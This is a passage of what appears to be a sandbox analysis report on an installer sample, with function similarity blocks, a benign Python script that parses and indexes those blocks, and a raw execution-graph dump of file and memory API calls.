                            • Source File: 00000006.00000002.1942402006.000000006C12B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C12B000, based on PE: true
                            Similarity
                            • API ID: H_prolog
                            • String ID: $D^J
                            APIs
                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?,00000000,6C117DC6), ref: 6C11070B
                            • __dosmaperr.LIBCMT ref: 6C110712
                            Memory Dump Source
                            • Source File: 00000006.00000002.1941249349.000000006BF71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF70000, based on PE: true
                            Similarity
                            • API ID: ErrorLast__dosmaperr
                            • String ID: 8Q
                            Memory Dump Source
                            • Source File: 00000006.00000002.1942402006.000000006C12B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C12B000, based on PE: true
                            Similarity
                            • API ID: H_prolog
                            • String ID: X&L$p|J
                            Memory Dump Source
                            • Source File: 00000006.00000002.1942402006.000000006C12B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C12B000, based on PE: true
                            Similarity
                            • API ID: H_prolog
                            • String ID: 0|J$`)L
                            • API String ID: 3519838083-117937767
                            • Opcode ID: 924921a2771934cbe07cb1819a4d5bd42f54cfcb7b164b76471555bcaac8b42b
                            • Instruction ID: 38e2ef957f2793d2dd41173faac304fbba41140352cacff4304d5d8e9742424c
                            • Opcode Fuzzy Hash: 924921a2771934cbe07cb1819a4d5bd42f54cfcb7b164b76471555bcaac8b42b
                            • Instruction Fuzzy Hash: A341B035601785DFDB119F61C8A07FABBE2FF55308F00482EE15A97B10CB35A958CB82
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1942402006.000000006C12B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C12B000, based on PE: true
                            • Associated: 00000006.00000002.1943055227.000000006C1F6000.00000004.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1943085177.000000006C1FC000.00000020.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6bf70000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: __aulldiv
                            • String ID: 3333
                            • API String ID: 3732870572-2924271548
                            • Opcode ID: 0d34d547a1763b1f6cbcb81569cbe66ca114cba913daa42be50c89cb46dd64ee
                            • Instruction ID: a2e2477e8ae694e01cb98732c048355068e246d2ae72727e08c9c6643ef809c0
                            • Opcode Fuzzy Hash: 0d34d547a1763b1f6cbcb81569cbe66ca114cba913daa42be50c89cb46dd64ee
                            • Instruction Fuzzy Hash: 622195B0A407146ED720CFAA8880B9BFAFDEB94755F10891EA186D7B40D774E9048B65
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1942402006.000000006C12B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C12B000, based on PE: true
                            • Associated: 00000006.00000002.1943055227.000000006C1F6000.00000004.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1943085177.000000006C1FC000.00000020.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6bf70000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: H_prolog
                            • String ID: @$LuJ
                            • API String ID: 3519838083-205571748
                            • Opcode ID: aa36ca613ac24c818774a3b50af302aa3ac6c7e5dc6eeb3b6f96232f2efdcf83
                            • Instruction ID: 6e8191fd566e5c6a7819b698779b68ba478922de9eb2fd05ce561b28262dee22
                            • Opcode Fuzzy Hash: aa36ca613ac24c818774a3b50af302aa3ac6c7e5dc6eeb3b6f96232f2efdcf83
                            • Instruction Fuzzy Hash: 9D018471E01315DADB10DF9AC4905AEF7B4FF66708F80842EE56AE3A41C3389905CF59
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1942402006.000000006C12B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C12B000, based on PE: true
                            • Associated: 00000006.00000002.1943055227.000000006C1F6000.00000004.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1943085177.000000006C1FC000.00000020.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6bf70000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: H_prolog
                            • String ID: @$xMJ
                            • API String ID: 3519838083-951924499
                            • Opcode ID: 871999b8a6dfe8dd14063548d73ca1d86140603a6c3ba165e22a59db3157078a
                            • Instruction ID: de7fbac89efcd8a344cbae7bb7c8dd05d4c2de1dad733d5c896e69178ac9b169
                            • Opcode Fuzzy Hash: 871999b8a6dfe8dd14063548d73ca1d86140603a6c3ba165e22a59db3157078a
                            • Instruction Fuzzy Hash: 62113C71A01219DBCB00CFE9D49059EB7B4FF5930CB90D4AEE469E7740D3389A05CB95
                            APIs
                            • _free.LIBCMT ref: 6C111439
                            • HeapReAlloc.KERNEL32(00000000,?,?,00000004,00000000,?,6C10DD2A,?,00000004,?,4B42FCB6,?,?,6C102E7C,4B42FCB6,?), ref: 6C111475
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1941249349.000000006BF71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF70000, based on PE: true
                            • Associated: 00000006.00000002.1941229763.000000006BF70000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1942340197.000000006C11B000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1942402006.000000006C12B000.00000008.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1943055227.000000006C1F6000.00000004.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1943085177.000000006C1FC000.00000020.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1943769712.000000006C2E7000.00000002.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6bf70000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: AllocHeap_free
                            • String ID: 8Q
                            • API String ID: 1080816511-4022487301
                            • Opcode ID: 93b51bc809cc3691ebf21364e5668808fb321ec3fed80b2012ee5bfdd8901414
                            • Instruction ID: 92282384c9d0367f55a263c925ce81f94b9a9daacb59f09ef81feced1784fe62
                            • Opcode Fuzzy Hash: 93b51bc809cc3691ebf21364e5668808fb321ec3fed80b2012ee5bfdd8901414
                            • Instruction Fuzzy Hash: 85F0F63274E511AAEB111A279C04B8BB7789FF3FB9F318136E82596E80DF3CD40581A1
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1942402006.000000006C12B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C12B000, based on PE: true
                            • Associated: 00000006.00000002.1943055227.000000006C1F6000.00000004.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1943085177.000000006C1FC000.00000020.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6bf70000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: H_prologctype
                            • String ID: |zJ
                            • API String ID: 3037903784-3782439380
                            • Opcode ID: 45f9250e3087bdd449dea7a7c5ec79293aeb189375d795e63a98390aaf881842
                            • Instruction ID: 971bcaa07dda248443bac21f4c0b741338b6ee4fb65461586ee67a3132a8d925
                            • Opcode Fuzzy Hash: 45f9250e3087bdd449dea7a7c5ec79293aeb189375d795e63a98390aaf881842
                            • Instruction Fuzzy Hash: 7AE0E532602124DBE7148B4AC81179DF3A4FF64718F10401F9012E3E40CBB4A8108681
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1942402006.000000006C12B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C12B000, based on PE: true
                            • Associated: 00000006.00000002.1943055227.000000006C1F6000.00000004.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1943085177.000000006C1FC000.00000020.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6bf70000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: H_prologctype
                            • String ID: <oJ
                            • API String ID: 3037903784-2791053824
                            • Opcode ID: f66cbee60b40af54c04d64295f8ed3aa4e69c018a581ef3e0b0762c85e8ebc26
                            • Instruction ID: 4473cd284e9a3f26059ccfbed9ad42d6ab32b037240301a69cec46d47c714b30
                            • Opcode Fuzzy Hash: f66cbee60b40af54c04d64295f8ed3aa4e69c018a581ef3e0b0762c85e8ebc26
                            • Instruction Fuzzy Hash: 2AE0E571A02110DBE704AF48C420BDEF7A8EF52714F52011EE021A3B51CBB5E810CB80
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1942402006.000000006C12B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C12B000, based on PE: true
                            • Associated: 00000006.00000002.1943055227.000000006C1F6000.00000004.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1943085177.000000006C1FC000.00000020.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6bf70000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID:
                            • String ID: @ K$DJ$T)K$X/K
                            • API String ID: 0-3815299647
                            • Opcode ID: c2360a40d33ebeca7632374cab2a44736fbf981b028df34ec032509b6de52aa1
                            • Instruction ID: b49743e3490fab6f9c4d7353a451ef2b68dec78eaf880f4424e9a5b75cf1e6fa
                            • Opcode Fuzzy Hash: c2360a40d33ebeca7632374cab2a44736fbf981b028df34ec032509b6de52aa1
                            • Instruction Fuzzy Hash: CB91C3386053059BDB18EF64C4647EE73B2EF6130CF108819C8666BB85DB79E98EC751
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1942402006.000000006C12B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C12B000, based on PE: true
                            • Associated: 00000006.00000002.1943055227.000000006C1F6000.00000004.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1943085177.000000006C1FC000.00000020.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6bf70000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID:
                            • String ID: D)K$H)K$P)K$T)K
                            • API String ID: 0-2262112463
                            • Opcode ID: 9be5c025380eda7c216aac381ad020450c93343e5c05b53f9846b5bc651498f8
                            • Instruction ID: f42f86aa4019df046d6915e54a1039b7bb7611677f39c546a686c4dd0348013c
                            • Opcode Fuzzy Hash: 9be5c025380eda7c216aac381ad020450c93343e5c05b53f9846b5bc651498f8
                            • Instruction Fuzzy Hash: FE51BF35A092099BDF10EF95D850BEEB7B1EF1531CF10445AF82567A80DB79D988CBE0
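                            The function blocks above are easier to triage once they are turned into records that can be indexed by API ID, by the APIs a function resolves, and by instruction fuzzy hash (for an exact-match comparison against the same blocks from another report of a related sample). The script below is an added example written for this page, not Joe Sandbox code; it parses the block layout exactly as it is rendered here. SAMPLE is a constructed excerpt: two blocks copied from the report above with the snapshot file name shortened. The script compares fuzzy hashes only by exact string equality; it does not implement Joe Sandbox's own fuzzy-hash distance, whose definition this page does not give.

```python
"""Parse Joe Sandbox 'Similarity' function blocks into records.

Added example, not Joe Sandbox code. Block layout as rendered in the report:
  APIs / Strings / Memory Dump Source / Joe Sandbox IDA Plugin / Similarity,
each followed by bullet ("•") lines. A block without API calls starts at "Strings".
"""
import re
from collections import defaultdict
from dataclasses import dataclass, field

# Constructed excerpt: two blocks from the report, snapshot file name shortened.
SAMPLE = """\
APIs
• _free.LIBCMT ref: 6C111439
• HeapReAlloc.KERNEL32(00000000,?,?,00000004,00000000,?,6C10DD2A,?,00000004,?,4B42FCB6,?,?,6C102E7C,4B42FCB6,?), ref: 6C111475
Strings
Memory Dump Source
• Source File: 00000006.00000002.1941249349.000000006BF71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF70000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_6bf70000_sample.jbxd
Similarity
• API ID: AllocHeap_free
• String ID: 8Q
• API String ID: 1080816511-4022487301
• Opcode ID: 93b51bc809cc3691ebf21364e5668808fb321ec3fed80b2012ee5bfdd8901414
• Instruction ID: 92282384c9d0367f55a263c925ce81f94b9a9daacb59f09ef81feced1784fe62
• Opcode Fuzzy Hash: 93b51bc809cc3691ebf21364e5668808fb321ec3fed80b2012ee5bfdd8901414
• Instruction Fuzzy Hash: 85F0F63274E511AAEB111A279C04B8BB7789FF3FB9F318136E82596E80DF3CD40581A1
APIs
Strings
Memory Dump Source
• Source File: 00000006.00000002.1942402006.000000006C12B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C12B000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_6bf70000_sample.jbxd
Similarity
• API ID: H_prolog
• String ID: @$LuJ
• API String ID: 3519838083-205571748
• Opcode ID: aa36ca613ac24c818774a3b50af302aa3ac6c7e5dc6eeb3b6f96232f2efdcf83
• Instruction ID: 6e8191fd566e5c6a7819b698779b68ba478922de9eb2fd05ce561b28262dee22
• Opcode Fuzzy Hash: aa36ca613ac24c818774a3b50af302aa3ac6c7e5dc6eeb3b6f96232f2efdcf83
• Instruction Fuzzy Hash: 9D018471E01315DADB10DF9AC4905AEF7B4FF66708F80842EE56AE3A41C3389905CF59
"""

SECTION_HEADERS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
# "• name.MODULE(args), ref: ADDR" or "• name.MODULE ref: ADDR"
API_LINE = re.compile(r"^•\s*(?P<name>[\w.]+)(?:\([^)]*\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$")
SOURCE_LINE = re.compile(r"^•\s*Source File:\s*(?P<file>[^,\s]+),\s*Offset:\s*(?P<offset>[0-9A-Fa-f]+)")
FIELD_LINE = re.compile(r"^•\s*(?P<key>[^:]+):\s*(?P<value>.*)$")


@dataclass
class FunctionRecord:
    api_calls: list = field(default_factory=list)   # (api name, ref address) pairs
    source_file: str = ""                           # memory dump the function was lifted from
    offset: str = ""                                # module base of that dump
    fields: dict = field(default_factory=dict)      # key/value pairs of the Similarity section

    @property
    def api_id(self) -> str:
        return self.fields.get("API ID", "")

    @property
    def instruction_fuzzy_hash(self) -> str:
        return self.fields.get("Instruction Fuzzy Hash", "")


def parse_blocks(text: str) -> list:
    """Split report text into FunctionRecords, one per rendered block."""
    records, current, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        # A new block starts at "APIs", or at "Strings" when the previous block is complete.
        if line == "APIs" or (line == "Strings" and (current is None or current.fields)):
            current = FunctionRecord()
            records.append(current)
            section = line
            continue
        if line in SECTION_HEADERS:
            section = line
            continue
        if current is None:
            continue
        if section == "APIs":
            m = API_LINE.match(line)
            if m:
                current.api_calls.append((m.group("name"), m.group("ref")))
        elif section == "Memory Dump Source":
            m = SOURCE_LINE.match(line)
            if m:
                current.source_file, current.offset = m.group("file"), m.group("offset")
        elif section == "Similarity":
            m = FIELD_LINE.match(line)
            if m:
                current.fields[m.group("key").strip()] = m.group("value").strip()
    return records


def index_by_api_id(records: list) -> dict:
    """Group records by the sandbox's API ID label (e.g. 'AllocHeap_free')."""
    index = defaultdict(list)
    for rec in records:
        index[rec.api_id].append(rec)
    return dict(index)


def functions_calling(records: list, api_prefix: str) -> list:
    """Records whose resolved API calls include one starting with api_prefix."""
    return [r for r in records if any(name.startswith(api_prefix) for name, _ in r.api_calls)]


def shared_functions(records_a: list, records_b: list) -> list:
    """Instruction fuzzy hashes present in both record sets (exact match only)."""
    hashes_b = {r.instruction_fuzzy_hash for r in records_b if r.instruction_fuzzy_hash}
    return sorted({r.instruction_fuzzy_hash for r in records_a} & hashes_b)


if __name__ == "__main__":
    recs = parse_blocks(SAMPLE)
    for api_id, group in index_by_api_id(recs).items():
        print(api_id, [r.offset for r in group])
    print("calls HeapReAlloc:", [r.offset for r in functions_calling(recs, "HeapReAlloc")])
```

To compare two reports, run parse_blocks over the copied block text of each and pass the results to shared_functions; an empty intersection only means no block is byte-identical on its instruction fuzzy hash, not that the samples are unrelated.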

                            Execution Graph

                            Execution Coverage: 4%
                            Dynamic/Decrypted Code Coverage: 0%
                            Signature Coverage: 0.4%
                            Total number of Nodes: 2000
                            Total number of Limit Nodes: 55

                            execution_graph: rendered call-graph data (node and edge list) omitted. The functions in the graph resolve to these imports and CRT routines: malloc, free, memcpy, memmove, memset, _CxxThrowException, __EH_prolog, __aulldiv, ctype, GetLastError, SetLastError, GetModuleHandleA, GetModuleHandleW, GetProcAddress, GetDiskFreeSpaceW, FindFirstFileW, FindClose, CloseHandle, wcscmp, CharUpperW, VariantClear, SysAllocStringLen, SetFilePointer, ReadFile, VirtualAlloc, GetCurrentProcess, GetProcessAffinityMask, GetSystemInfo, GlobalMemoryStatus, GlobalMemoryStatusEx.
74275->74262 74276->74264 74277->74266 74278->74268 74279->74203 74281 cef047 _CxxThrowException 74280->74281 74282 cf0407 74281->74282 74283 cef047 _CxxThrowException 74282->74283 74284 cf0475 74282->74284 74289 cf0421 74283->74289 74300 cf049a 74284->74300 74424 cefa3f 22 API calls 2 library calls 74284->74424 74285 cf04e8 74427 cf7c4a malloc _CxxThrowException free ctype 74285->74427 74287 cf04cd 74426 cefff0 9 API calls 2 library calls 74287->74426 74288 cf043e 74422 cef93c 7 API calls 2 library calls 74288->74422 74289->74288 74421 ceef67 _CxxThrowException 74289->74421 74291 cf0492 74294 cef047 _CxxThrowException 74291->74294 74294->74300 74296 cf04b8 74296->74285 74296->74287 74297 cf04db 74302 cef047 _CxxThrowException 74297->74302 74299 cf04e3 74304 cf054a 74299->74304 74429 ceef67 _CxxThrowException 74299->74429 74300->74296 74425 cf159a malloc _CxxThrowException free ctype 74300->74425 74301 cf0446 74303 cf046d 74301->74303 74423 ceef67 _CxxThrowException 74301->74423 74302->74299 74305 cef047 _CxxThrowException 74303->74305 74304->74218 74305->74284 74306 cf04f3 74306->74299 74428 cb089e malloc _CxxThrowException free _CxxThrowException memcpy 74306->74428 74311 ce04d2 5 API calls 74310->74311 74312 cb12ad 74311->74312 74316 ca42a7 74315->74316 74320 ca42c5 74315->74320 74317 ca42b3 74316->74317 74430 ca1e40 free 74316->74430 74317->74320 74320->74218 74322 ce81f6 __EH_prolog 74321->74322 74431 cef749 74322->74431 74408 ceb8e6 __EH_prolog 74407->74408 74421->74288 74422->74301 74423->74303 74424->74291 74425->74296 74426->74297 74427->74306 74428->74306 74429->74304 74430->74317 74518 ce0343 74523 ce035f 74518->74523 74521 ce0358 74524 ce0369 __EH_prolog 74523->74524 74540 cb139e 74524->74540 74529 ce0143 ctype free 74530 ce039a 74529->74530 74550 ca1e40 free 74530->74550 74532 ce03a2 74551 ca1e40 free 74532->74551 74534 ce03aa 74552 ce03d8 74534->74552 74539 ca1e40 free 74539->74521 74541 cb13ae 74540->74541 74542 cb13b3 74540->74542 74568 d37ea0 
SetEvent GetLastError 74541->74568 74544 ce01c4 74542->74544 74548 ce01ce __EH_prolog 74544->74548 74545 ce0203 74569 ca1e40 free 74545->74569 74547 ce020b 74547->74529 74548->74545 74570 ca1e40 free 74548->74570 74550->74532 74551->74534 74553 ce03e2 __EH_prolog 74552->74553 74554 cb139e ctype 2 API calls 74553->74554 74555 ce03fb 74554->74555 74571 d37d50 74555->74571 74557 ce0403 74558 d37d50 ctype 2 API calls 74557->74558 74559 ce040b 74558->74559 74560 d37d50 ctype 2 API calls 74559->74560 74561 ce03b7 74560->74561 74562 ce004a 74561->74562 74563 ce0054 __EH_prolog 74562->74563 74577 ca1e40 free 74563->74577 74565 ce0067 74578 ca1e40 free 74565->74578 74567 ce006f 74567->74521 74567->74539 74568->74542 74569->74547 74570->74548 74572 d37d59 CloseHandle 74571->74572 74575 d37d7b 74571->74575 74573 d37d75 74572->74573 74574 d37d64 GetLastError 74572->74574 74573->74575 74574->74575 74576 d37d6e 74574->74576 74575->74557 74576->74557 74577->74565 74578->74567 74579 ccd3c2 74580 ccd3e9 74579->74580 74581 ca965d VariantClear 74580->74581 74582 ccd42a 74581->74582 74583 ccd883 2 API calls 74582->74583 74584 ccd4b1 74583->74584 74670 cc8d4a 74584->74670 74591 ca2fec 3 API calls 74592 ccd594 74591->74592 74593 ccd5cd 74592->74593 74594 ccd742 74592->74594 74596 ccd7d9 74593->74596 74695 cc9317 74593->74695 74722 cccd49 malloc _CxxThrowException free 74594->74722 74725 ca1e40 free 74596->74725 74597 ccd754 74600 ca2fec 3 API calls 74597->74600 74603 ccd763 74600->74603 74601 ccd7e1 74726 ca1e40 free 74601->74726 74723 ca1e40 free 74603->74723 74605 ccd5f1 74608 ce04d2 5 API calls 74605->74608 74607 ccd7e9 74610 cc326b free 74607->74610 74611 ccd5f9 74608->74611 74609 ccd76b 74724 ca1e40 free 74609->74724 74621 ccd69a 74610->74621 74701 cce332 74611->74701 74614 ccd773 74617 cc326b free 74614->74617 74617->74621 74618 ccd610 74708 ca1e40 free 74618->74708 74620 ccd618 74709 cc326b 74620->74709 74623 ccd2a8 74623->74621 74645 ccd883 74623->74645 74646 ccd88d __EH_prolog 
74645->74646 74647 ca2e04 2 API calls 74646->74647 74648 ccd8c6 74647->74648 74649 ca2e04 2 API calls 74648->74649 74650 ccd8d2 74649->74650 74651 ca2e04 2 API calls 74650->74651 74652 ccd8de 74651->74652 74727 cc2b63 74652->74727 74671 cc8d54 __EH_prolog 74670->74671 74685 cc8da4 74671->74685 74735 ca2b55 malloc _CxxThrowException free _CxxThrowException ctype 74671->74735 74672 cc8e09 74675 ca965d VariantClear 74672->74675 74673 cc8e15 74674 cc8e2d 74673->74674 74676 cc8e5e 74673->74676 74677 cc8e21 74673->74677 74674->74676 74678 cc8e2b 74674->74678 74679 cc8e11 74675->74679 74681 ca965d VariantClear 74676->74681 74736 ca3097 malloc _CxxThrowException free SysStringLen ctype 74677->74736 74683 ca965d VariantClear 74678->74683 74687 cc8b05 74679->74687 74681->74679 74684 cc8e47 74683->74684 74684->74679 74737 cc8e7c 6 API calls __EH_prolog 74684->74737 74685->74672 74685->74673 74685->74679 74689 cc8b2e 74687->74689 74688 ca965d VariantClear 74690 cc8b5b 74688->74690 74689->74688 74691 cc2a72 74690->74691 74692 cc2a82 74691->74692 74693 ca2e04 2 API calls 74692->74693 74694 cc2a9f 74693->74694 74694->74591 74696 cc9321 __EH_prolog 74695->74696 74697 cc9360 74696->74697 74738 ca9686 VariantClear 74696->74738 74698 ca965d VariantClear 74697->74698 74699 cc93d0 74698->74699 74699->74596 74699->74605 74702 cce33c __EH_prolog 74701->74702 74703 ca1e0c ctype 2 API calls 74702->74703 74704 cce34a 74703->74704 74705 ccd608 74704->74705 74739 cce3d1 malloc _CxxThrowException __EH_prolog 74704->74739 74707 ca1e40 free 74705->74707 74707->74618 74708->74620 74710 cc3275 __EH_prolog 74709->74710 74740 cc2c0b 74710->74740 74713 cc2c0b ctype free 74714 cc3296 74713->74714 74745 ca1e40 free 74714->74745 74716 cc329e 74746 ca1e40 free 74716->74746 74718 cc32a6 74747 ca1e40 free 74718->74747 74720 cc32ae 74720->74623 74722->74597 74723->74609 74724->74614 74725->74601 74726->74607 74728 cc2b6d __EH_prolog 74727->74728 74729 ca2e04 2 API calls 74728->74729 74735->74685 
74736->74678 74737->74679 74738->74697 74739->74705 74748 ca1e40 free 74740->74748 74742 cc2c16 74749 ca1e40 free 74742->74749 74744 cc2c1e 74744->74713 74745->74716 74746->74718 74747->74720 74748->74742 74749->74744 74750 cab144 74751 cab153 74750->74751 74753 cab159 74750->74753 74754 cb11b4 74751->74754 74755 cb11c1 74754->74755 74756 cb11eb 74755->74756 74759 ceae7c 74755->74759 74764 ceaf27 74755->74764 74756->74753 74760 ceae86 74759->74760 74771 cb7190 74760->74771 74784 cb7140 74760->74784 74761 ceaebb 74761->74755 74767 ceaf36 74764->74767 74765 ceb010 74765->74755 74766 ceaeeb 107 API calls 74766->74767 74767->74765 74767->74766 74869 cabd0c 74767->74869 74874 cead3a 74767->74874 74878 ceaebf 107 API calls 74767->74878 74772 cb719a __EH_prolog 74771->74772 74773 cb71b0 74772->74773 74777 cb71dd 74772->74777 74814 cb4d78 74773->74814 74776 cb71b7 74776->74761 74788 cb6fc5 74777->74788 74778 cb72b4 74779 cb72c0 74778->74779 74780 cb4d78 VariantClear 74778->74780 74779->74776 74781 cb7140 7 API calls 74779->74781 74780->74779 74781->74776 74782 cb72a3 SetFileSecurityW 74782->74778 74783 cb7236 74783->74776 74783->74778 74783->74782 74785 cb718d 74784->74785 74786 cb714b 74784->74786 74785->74761 74786->74785 74868 cb4dff 7 API calls 2 library calls 74786->74868 74789 cb6fcf __EH_prolog 74788->74789 74817 cb44a6 74789->74817 74791 cb706a 74820 cb68ac 74791->74820 74796 cb709e 74844 ca1e40 free 74796->74844 74797 cb7051 74797->74791 74802 cb11b4 107 API calls 74797->74802 74798 cb7029 74798->74791 74839 cb4dff 7 API calls 2 library calls 74798->74839 74801 cb70c0 74840 ca6096 15 API calls 2 library calls 74801->74840 74802->74791 74803 cb712e 74803->74783 74805 cb70d1 74808 cb70e2 74805->74808 74841 cb4dff 7 API calls 2 library calls 74805->74841 74811 cb70e6 74808->74811 74842 cb6b5e 69 API calls 2 library calls 74808->74842 74809 cb70fd 74810 cb7103 74809->74810 74809->74811 74843 ca1e40 free 74810->74843 74811->74796 74813 cb710b 74813->74803 74861 cc9262 
74814->74861 74818 ca2e04 2 API calls 74817->74818 74819 cb44be 74818->74819 74819->74791 74819->74798 74838 cb6e71 12 API calls 2 library calls 74819->74838 74821 cb68b6 __EH_prolog 74820->74821 74823 cb6921 74821->74823 74835 cb68c5 74821->74835 74846 ca7d4b 74821->74846 74824 cb6962 74823->74824 74826 cb6998 74823->74826 74852 cb6a17 6 API calls 2 library calls 74823->74852 74824->74826 74853 ca2dcd malloc _CxxThrowException 74824->74853 74827 cb69e1 74826->74827 74845 ca7c3b SetFileTime 74826->74845 74856 cabcf8 CloseHandle 74827->74856 74832 cb697a 74854 cb6b09 13 API calls __EH_prolog 74832->74854 74835->74796 74835->74801 74836 cb698c 74855 ca1e40 free 74836->74855 74838->74798 74839->74797 74840->74805 74841->74808 74842->74809 74843->74813 74844->74803 74845->74827 74857 ca77c8 74846->74857 74848 ca7d76 74848->74823 74851 cb4dff 7 API calls 2 library calls 74848->74851 74851->74823 74852->74824 74853->74832 74854->74836 74855->74826 74856->74835 74858 ca7731 5 API calls 74857->74858 74859 ca77db 74858->74859 74859->74848 74860 ca7d3c SetEndOfFile 74859->74860 74860->74848 74862 cc926c __EH_prolog 74861->74862 74863 cc92a4 74862->74863 74864 cc92fc 74862->74864 74865 ca965d VariantClear 74863->74865 74866 ca965d VariantClear 74864->74866 74867 cb4d91 74865->74867 74866->74867 74867->74776 74868->74785 74879 ca7ca2 74869->74879 74872 cabd3d 74872->74767 74875 cead44 __EH_prolog 74874->74875 74887 cb6305 74875->74887 74876 ceadbf 74876->74767 74878->74767 74882 ca7caf 74879->74882 74881 ca7cdb 74881->74872 74883 cab8ec GetLastError 74881->74883 74882->74881 74884 ca7c68 74882->74884 74883->74872 74885 ca7c79 WriteFile 74884->74885 74886 ca7c76 74884->74886 74885->74882 74886->74885 74888 cb630f __EH_prolog 74887->74888 74924 cb62b9 74888->74924 74890 cb6427 74893 ca965d VariantClear 74890->74893 74892 cb644a 74894 ca965d VariantClear 74892->74894 74916 cb6445 74893->74916 74895 cb646b 74894->74895 74928 cb5126 74895->74928 74898 cc8b05 VariantClear 74899 
cb648a 74898->74899 74900 cb4d78 VariantClear 74899->74900 74899->74916 74901 cb6499 74900->74901 74901->74916 74920 cb64ca 74901->74920 75080 cb5110 9 API calls 74901->75080 74903 cb65de 74904 cb669e 74903->74904 74905 cb65e7 74903->74905 74910 cb66b8 74904->74910 74911 cb6754 74904->74911 74904->74916 74908 ca1e0c ctype 2 API calls 74905->74908 74912 cb65f6 74905->74912 74906 cb64da 74906->74903 74906->74916 75082 cb789c free memmove ctype 74906->75082 74908->74912 74914 ca1e0c ctype 2 API calls 74910->74914 74970 cb5bea 74911->74970 75083 cc36ea 74912->75083 74913 cb666b 75096 ca1e40 free 74913->75096 74914->74916 74916->74876 74917 cb665c 75095 ca31e5 malloc _CxxThrowException free _CxxThrowException 74917->75095 74920->74906 74920->74916 75081 ca42e3 CharUpperW 74920->75081 74925 cb62c9 74924->74925 75097 cc8fa4 74925->75097 74929 cb5130 __EH_prolog 74928->74929 74930 cb51b4 74929->74930 74936 cb518e 74929->74936 75141 ca3097 malloc _CxxThrowException free SysStringLen ctype 74929->75141 74933 ca965d VariantClear 74930->74933 74930->74936 74932 ca965d VariantClear 74935 cb527f 74932->74935 74934 cb51bc 74933->74934 74934->74936 74937 cb5289 74934->74937 74938 cb5206 74934->74938 74935->74898 74935->74916 74936->74932 74937->74936 74939 cb5221 74937->74939 75142 ca3097 malloc _CxxThrowException free SysStringLen ctype 74938->75142 74941 ca965d VariantClear 74939->74941 74942 cb522d 74941->74942 74942->74935 74943 cb5351 74942->74943 75143 cb5459 malloc _CxxThrowException __EH_prolog 74942->75143 74943->74935 74950 cb53a1 74943->74950 75148 ca35e7 memmove 74943->75148 74946 cb52ba 75144 ca8011 5 API calls ctype 74946->75144 74948 cb52cf 74961 cb52fd 74948->74961 75145 ca823d 10 API calls 2 library calls 74948->75145 74950->74935 75149 ca43b7 5 API calls 2 library calls 74950->75149 74952 cb52e5 74954 ca2fec 3 API calls 74952->74954 74956 cb52f5 74954->74956 